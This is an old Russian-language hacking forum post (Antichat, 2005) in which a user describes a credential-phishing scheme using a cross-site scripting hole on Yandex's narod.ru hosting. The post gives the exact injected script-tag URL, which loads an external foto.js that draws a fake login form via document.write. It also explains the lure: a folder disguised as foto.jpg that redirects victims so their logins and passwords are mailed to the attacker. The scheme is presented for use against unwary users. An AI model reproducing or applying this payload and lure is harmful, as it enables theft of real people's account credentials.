ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #13  
Старый 09.10.2005, 16:47
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

короче смысл такой:

создаём сайт на народе... делаем папку под названиваем foto.jpg пихаем в неё страницу страницу index.html с перенаправлением на [http://narod.yandex.ru/100.xhtml?entermatrix.narod.ru"><script/**/src="http://entermatrix.narod.ru/foto.js"></script>]
создаём анкету с 2-мя полями, в [http://entermatrix.narod.ru/foto.js] прописываем код этих полей, перед ними пишем логин и пароль...

всё!

теперь заходим например на чат на народе, даём какому нибудь челу ссыку на свою фоту

например ***.narod.ru/foto.jpg

т.к. это папка она открывает index.html, идёт перенаправление на страницу народа с моей xss в которой с помощью foto.js и прописаннными в ней формами (document.write), пишется типо введите ваш логин и пароль чтобы скачать фоту... данные отсылаются на твоё мыло прописанное при создании "анкеты", можно ещё сделать так, чтоб при нажатии кнопки перенаправляло на какуюнить картинку, можно даже фотку =)

вот и всё...

конечно же всё расчитано на ламера, хотя многие не смотрят на адрес страницы...
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблемы безопасности Веб-интерфейсов почтовых сервисов на примере rambler.ru k00p3r Чужие Статьи 0 13.07.2005 08:54
чтение почты на mail.ru и rambler.ru 4e/\ E-Mail 53 15.06.2005 17:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ